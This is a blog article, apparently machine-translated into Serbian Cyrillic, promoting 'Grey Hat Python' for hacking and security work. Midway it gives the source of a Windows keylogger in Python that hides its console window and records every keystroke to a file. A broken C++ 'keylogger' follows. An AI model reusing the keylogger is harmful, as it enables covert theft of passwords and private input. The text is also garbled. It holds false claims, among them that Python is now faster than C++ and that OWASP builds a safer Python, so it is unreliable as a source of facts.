Греи Хат Питхон - Дакле, пре две године, истраживао сам програмске језике, почео сам да читам Ц, Ц ++, Ассембли, Питхон и Руби. Желео сам да постанем експерт за кибернетичку безбедност. Дакле, почео сам да учим колико могу. Почео сам са Ц, Ц ++ и Ц # као основама, а након учења и компилације пуно програма и вируса, коначно сам почео да учим Кали Линук. За оне који не знају шта је Кали Линук, то је оперативни систем за продирање тестова. Дакле, наставио сам са својим студијама и видео сам да је већина програма, вируса и тројанаца састављена у Питхон-у, а њихова база је Руби.

Дакле, засад сам прекинуо студије и почео да учим Питхон или да будем прецизан Греи Хат Питхон и тадаа … Било је изузетно лако у поређењу са Ц, Ц # или било којим другим језиком који сам научио. Коначно сам сазнао зашто је Питхон био најкоришћенији језик и како је постао познат.
Дакле, данас бих расправљао о томе како се Питхон трансформисао у Граи Хат Питхон и зашто се толико интензивно користи да га чак и Гоогле и ИоуТубе користе у својој бази података да дају што прецизније резултате претраживања.

Од самог почетка, Питхон је програмски језик високог нивоа, што значи да су његове синтаксе изузетно лако прочитати, чак и за почетнике. Ако сте нови у програмирању, то би био језик на којем бих вам предлагао да започнете. Дозволите ми да вам дам пример:

Овако то изгледа на Ц: -

#include

int main()
(
printf("Hello world\n");
return 0;
)

Овако то изгледа на Јави: -

class HelloWorld
(
public static void main (String args())
(
System.out.println ("Hello World");
)
)

А, тако то изгледа у Питхону (в2.7)

print "Hello World"

Једноставно? Да, јесте. Дакле, Питхон је био не само лак за писање и разумевање, већ и врло компактан. Па, можда се питате како је то довело до Греи Хат Питхон-а?

Препоручени курсеви

  • Обука за усмеравање ИП адреса
  • Хкерски курс за обуку
  • Комплетна РМАН обука
  • Обука програмирања Питхон-а

Питхон вс Греи Хат Питхон

Па, шта је тачно Греи Хат Питхон? Зашто се толико разликује од нашег нормалног Питхона? Ствар је у томе што Греи Хат Питхон није ништа друго него програми који су у Питхон-у написали Хацкерс, Нетворк-Стресс тестери и Реверсе Енгинеерс да би креирали или покварили програм. Али, израз Греи Хат се користи јер није баш користан или кориснички софтвер. Користи се за заштиту или прављење софтвера који пробија сигурност.

Може се лако користити или за тестирање ограничења сигурног окружења или за пробијање у сигурно окружење. То значи Греи Хат. А то је далеко лакше учинити на Питхон-у, а не радити на Ц, Ц ++ или јави. Тако име Греи Хат Питхон. Неколико примера којих се могу сјетити су:

• Писање записника кључева (за хакере и пентетере)
• Писање скрипти сигурносних шкољки (за мрежне администраторе)
• Писање аутоматизованог ИДС-а (систем за откривање провале за безбедносне инжењере)

Дакле, сада знате зашто и како је Граи Хат Питхон користан. Да бих ово разрадио, допустите да вам дам неколико детаљних примера.
Можда сте чули за Гоогле Апп Енгине. Гоогле Апп Енгине првобитно је дизајниран у Питхон-у пре него што је пренесен. Гоогле апликација је прави пример програма написаног на Питхон-у, јер омогућава израду веб апликација користећи своју богату колекцију библиотека, алата и оквира.

Да ли сте се икад запитали зашто је тако лако претражити нешто на Гооглеу? Већину времена добијате резултате претраге који су тачно 80%. То је зато што је Питхон изузетно флексибилан, ради великом брзином, а базе података су много компактније иако складишти 'н' број информација. Питхон је толико проширив да га чак и ИоуТубе користи у сврхе као што су гледање видеа, контрола предложака, администрирање видео записа, приступ канонским подацима и још много тога.

Гоогле има своје индексе и пауке који прикупљају податке чим се учитају на веб, без обзира на то где су и колико безбедни. Једноставно је потребна одговарајућа инспирација, време и знање за прикупљање ових информација.

Гоогле претраге претходно су се заснивале на Питхон-у, који је касније променио у Ц ++ ради оптимизације брзине, јер Гоогле претраживачи индеирају много страница у секунди и свакој од њих је потребно неколико минута да се успешно претражи. Питхон је тренутно много бржи од Ц ++, али то није био исти случај пре неколико деценија.

Била је позната Цитата коју је цитирао Гоогле: -
"Питхон где можемо, Ц ++ где морамо."

Дакле, можда се питате како се то може користити за хаковање, пребијање пензија и безбедност мреже. Молим да се разликујем. Ако бисте могли да направите програм који је 70% -80% прецизан у давању ефикасних резултата претраживања, вероватно можете да направите апликацију која може да повезује веб локације, паметно претражује и прави профил особе коју радије могу да користе поједини црни шешири у злонамерне сврхе. Оставите појединце по страни, онај ако је довољно паметан, лако може да направи апликацију за изградњу профила компаније, целог дрвета од свог корена до онога што можете да мислите …

Окупљање информација преко Малтега

Можда мислите да мало претјерујем. Не, нисам!

Помислите на примере попут Малтега. Малтего је софтвер или га могу боље дефинисати као форензичку апликацију отвореног кода, направљену за прикупљање информација и стварање профила људи, компанија и других корпоративних агенција.

Треба само да унесете одговарајуће податке у апликацију, а остатак ствари као што су повезивање е-поште, људи, групе људи, чак и одређивање интернет инфраструктуре као што су Домене, ДНС имена, Нетблоцкс и ИП адресе могу бити повезани и међусобно повезани користећи ову интелигенцију отвореног кода .

За више информација посетите шта је Малтего?

Дакле, ако приступ „тајним информацијама“ одређује ваш успех, тада вам Малтего може помоћи да га откријете. Малтего је делимично написан на Питхону и користи Јава, што је такође одличан језик.

Толико да цитирам сигурност Гоогле-а. Да будемо прецизнији, Гоогле је најмањи начин на који можете остати анонимни на вебу, без обзира да ли употребљавате анонимно или ввв.дуцкдуцкго.цом од хрома. Јер, на крају се све ажурира на вебу. Суштина овде је да се не ради о нерањивости, већ о апсолутној рањивости. Не може се потпуно избрисати са интернета. Али сигурно се може покушати задржати што мање информација на Интернету.

Питхон није само језик, већ и скриптни језик. Језици скрипта вам омогућавају да пишете, мењате сопствене алате када вам треба нешто више прилагођеног. Ови мрежни алати за безбедност увелико зависе од језика скриптирања због проширивости. На пример, узмимо Сцапи.

Сцапи је чисто написан на Питхон-у. То је моћан интерактивни алат за манипулацију пакетима. Може самостално да генерише лажне пакете, скенира мреже и чак може да њушка пакете на мрежи.

Пронађите детаљне информације о томе шта је Сцапи?

Сада су то сложени програми које су написали напредни програмери. Да видимо како је једноставно написати програм на Питхон-у који могу лако разумети људи који имају добре основе у програмирању.

Ово је кеилоггер написан на Питхон-у:

#!/usr/bin/Python
import pyHook
import Pythoncom
import win32gui
import win32console
log_file = "log_file.txt" #name of log file
window = win32console. GetConsoleWindow() #go to script window
win32gui.ShowWindow (window, 0) #hide window
def pressed_chars(event): #on key pressed function
if event.Ascii:
f = open(log_file, "a") # (open log_file in append mode)
char = chr (event.Ascii) # (insert real char in variable)
if char == "q": # (if char is q)
f.close() # (close and save log file)
exit() # (exit program)
if event.Ascii == 13: # (if char is "return")
f.write("\n") # (new line)
f.write(char) # (write char)

proc = pyHook.HookManager() #open pyHook
proc.KeyDown = pressed_chars #set pressed_chars function on KeyDown event
proc.HookKeyboard() #start the function
Pythoncom.PumpMessages() #get input

Дакле, ово је много више него лако ако мене питате. Управо сам додао модуле пихоок, Питхонцом, вин32гуи и вин32цонсоле које лако можете преузети са веб локације соурцефорге, а коментаре сам споменуо користећи хасх-таг. Али ако морам да напишем исти програм на Ц ++, да видимо колико то може бити тешко.

Ово је програм написан на Ц ++: -

 #include #include #include #include int main(int argc, char ** agrv)( using namepace std; /*Easier*/ char std::vector input_STRUCT = ("S", "T", "O"); char std::vector input_STRUCT_1 = ("P", ""); char std::vector input_STRUCT_2 = ("L", "O", "O", "K", "I", "N", "G"); char std::vector input_STRUCT_3 = ("", "F", "O", "R"); char std::vector input_STRUCT_4 = ("M", "A", "L", "W"); char std::vector input_STRUCT_5 = ("A", "R", "E"); ostream os("C:\users\keylogger.txt"); int i; for( i = 0; i <=2; i++)( os << input_STRUCT(i); for(;i <= 1000000 ;i++)( ) ) for( i=0; i<=1;i++)( os << input_STRING_1(i); for(;i <= 1000000 ;i++)( ) ) for(i=0; i<=6; i++) ( os << input_STRING_2 (i); for(; i <= 1000000 ; i++)( ) for(i=0; i<=3;i++)( os << input_STRING_3(i); for(; i <= 1000000 ;i++)( ) ) for(i=0; i<=3; i++)( os << input_STRING_4(i); for(;i <= 1000000 ; i++)( ) ) for(i=0; i<=2; i++)( os << input_STRING_5(i); for(;i <= 1000000 ; i++)( ) ) os.close(); istream is (" C:\users\keylogger.txt "); cout << is; return 0; )

Дакле, ово је прилично велико у поређењу са Питхон-ом. А ако говоримо о ефикасности, Питхон се може лако компајлирати у извршну датотеку без икаквог напора користећи пи2еке софтвер. Док ако говорим о Ц ++, искрено говорећи, овај код је шала. Да бисте написали одговарајући логер за кључеве, потребно је написати ДЛЛ који имплементира ВХ_КЕИБОАРД куку. Поред тога, почетнику је то једноставно далеко од разумевања.

Хакирање са отвореним кодом

Сада се ово брине за хакере Блацк Хат, који су прецизнији људи који намеравају да уништавају, манипулишу подацима за сопствене потребе. Када је реч о забринутости за безбедност, Питхон је користан и за хакере на Вхите Хат који намеравају да спасу друштво од напада злонамерних хакера. Ако желите да развијете каријеру или бар желите да научите Питхон за сигурносна истраживања, онда се сигурно можете дубоко удубити с ОВАСП, БРО или Куицк НИКС Сецуре Сцрипт.

ОВАСП је пројекат безбедности отворених веб апликација. Циљ ОВАСП-а је стварање сигурније верзије Питхона која ће безбедносним професионалцима и програмерима олакшати писање софтвера мање склоног нападима од стране хакера. Повезана је са Блацк-Бок анализом, идентификовањем и решавањем проблема везаних за безбедност који могу утицати на Питхон-ов интерактивни тумач.

БРО је мрежни програм за праћење безбедности и саобраћаја, док се Куицк НИКС користи за учвршћивање и обезбеђивање власништва над датотекама у току.

Пошто говоримо о безбедности, разговарајмо о оперативном систему који се делимично заснива на Питхон-у. Питхон одлично функционира са УНИКС-ом, ЛИНУКС-ом и Дебиан-ом. Један од најпознатијих оперативних система био је Бацктрацк 5. Објављене су различите верзије. Посебно је дизајниран за ПенТестинг. Касније су људи у Офанзивној безбедности помислили да је Бацктрацк потребан за поновно покретање система, јер већина алата или не ради исправно или није подржана.

Касније су издали Кали Линук који је у потпуности заснован на Дебиану. А већина његовог оквира налази се или у Рубију или Питхону. Руби је такође сјајан сценаристички језик. Али било који пут бих више волео Питхон због тога, разлог што Питхон има разноврснију заједницу са Линуком и његову директнију и једноставнију исправку. Иако Руби има мноштво функција и брзо се прилагођава околном окружењу, може бити тешко исправити погрешку, тешко се чита и софистициранији је од Питхона.

Најбољи пример би био упоређивање Аппле-а и Линук-а или Упоређивање ипхоне-а и Андроид-а. Аппле је богат ресурсима и изузетно је гладак, и више је пристран према почетницима. Док је Линук / Андроид кориснији, помало лаган и понекад може представљати главобољу ако не знате како да га конфигуришете или одржавате.

Постоји чак и књига заснована на хакирању Питхон Греи Хат-а Јустина Сеитза. Бави се посебно аутоматизацијом досадних обрнутих инжењеринга и сигурносних задатака, дизајнирањем сопственог програма за уклањање погрешака, библиотеке и ДЛЛ убризгавањем, њушањем сигурног саобраћаја током шифроване сесије и коришћењем програма за уклањање имунитета, Суллеи-а и многих других. То је сјајна књига, није важно да ли сте почетник или сте стручњак, увек ћете научити неку или другу ствар сваки пут када је прочитате.

Закључак

Дакле, ако сте почетник, Питхон би био прави избор за вас да почнете као свој први језик безбедносног тестирања програмирања.

Сјетите се само једне ствари на крају, Граи Хат Питхон није само језик, већ начин да се ствари раде на правилан и брз начин.

Први извор слике: пикабаи.цом

Повезани чланци:-

Ево неколико чланака који ће вам помоћи да сазнате више детаља о Граи Хат Питхон-у, зато само прођите кроз линк.

  1. Предности алата за цибер безбедност Морате бити свесни
  2. Каријере у Питхон-у
  3. 25 најбољих питања и одговора за најневероватнији Питхон интервју
  4. Које су предности и ограничења употребе Питхона?
  5. Питхон вс Ноде.јс
  6. Водич за питања о интервјуу за цибер безбедност
  7. Различите врсте алата за тестирање сигурности

Категорија:

Развој софтвера